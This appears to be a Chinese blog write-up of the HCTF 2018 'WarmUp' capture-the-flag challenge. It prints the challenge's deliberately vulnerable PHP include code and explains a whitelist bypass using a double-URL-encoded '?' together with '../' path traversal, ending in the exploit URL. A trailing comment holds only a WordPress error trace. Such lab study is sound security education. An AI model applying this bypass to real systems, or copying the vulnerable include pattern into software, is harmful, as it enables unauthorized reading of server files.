[HCTF 2018]WarmUp

打开首页,看到一个很大的滑稽,F12可以看到存在一个source.php

打开source.php,代码如下:

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

得到另一个地址hint.php,提示flag在ffffllllaaaagggg中

继续审计source.php文件:

if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  

这段代码告诉我们要显示flag必须同时达到以下三个条件:

1.值不为空
2.值为字符串
3.能通过checkFile()函数的检测    

查看checkFile()函数:

highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

可以看到4个if语句:

1.第一个要求$page为字符串类型
2.第二个要求$page存在于$whitelist中
3.第三个要求$page从?截取后的前半部分存在于$whitelist中
4.第四个要求$page进行url解码并截取后存在于$whitelist中

第四个if语句中,先进行url解码再截取,因此我们可以将?经过两次url编码(?两次url编码后为%253F),仍会解码为'?',仍可通过第四个if语句校验。构造url:

http://e981d546-a52c-4358-8479-fa9bc1a48c03.node3.buuoj.cn/source.php?file=source.php%253fffffllllaaaagggg

因为不知道ffffllllaaaagggg存放的位置,所以以此增加../,直到读到flag,最中得到的url为:

http://e981d546-a52c-4358-8479-fa9bc1a48c03.node3.buuoj.cn/source.php?file=source.php%253f../../../../../ffffllllaaaagggg

点赞
  1. DavidPealp说道:
    Google Chrome Windows 10

    Fatal error: Uncaught ArgumentCountError: Too few arguments to function Walker_Comment::filter_comment_text(), 1 passed in /www/wwwroot/lolimoe.fun/wp-includes/class-wp-hook.php on line 303 and exactly 2 expected in /www/wwwroot/lolimoe.fun/wp-includes/class-walker-comment.php:267 Stack trace: #0 /www/wwwroot/lolimoe.fun/wp-includes/class-wp-hook.php(303): Walker_Comment->filter_comment_text() #1 /www/wwwroot/lolimoe.fun/wp-includes/plugin.php(189): WP_Hook->apply_filters() #2 /www/wwwroot/lolimoe.fun/wp-content/themes/kratos-master/inc/ua.php(432): apply_filters() #3 /www/wwwroot/lolimoe.fun/wp-content/themes/kratos-master/inc/ua.php(436): user_agent_display_comment() #4 /www/wwwroot/lolimoe.fun/wp-includes/class-wp-hook.php(305): user_agent() #5 /www/wwwroot/lolimoe.fun/wp-includes/plugin.php(189): WP_Hook->apply_filters() #6 /www/wwwroot/lolimoe.fun/wp-includes/comment-template.php(1028): apply_filters() #7 /www/wwwroot/lolimoe.fun/wp-includes/class-walker-comment.php(361): comment_text() #8 /www/wwwroot/lolimoe.fun/wp in /www/wwwroot/lolimoe.fun/wp-includes/class-walker-comment.php on line 267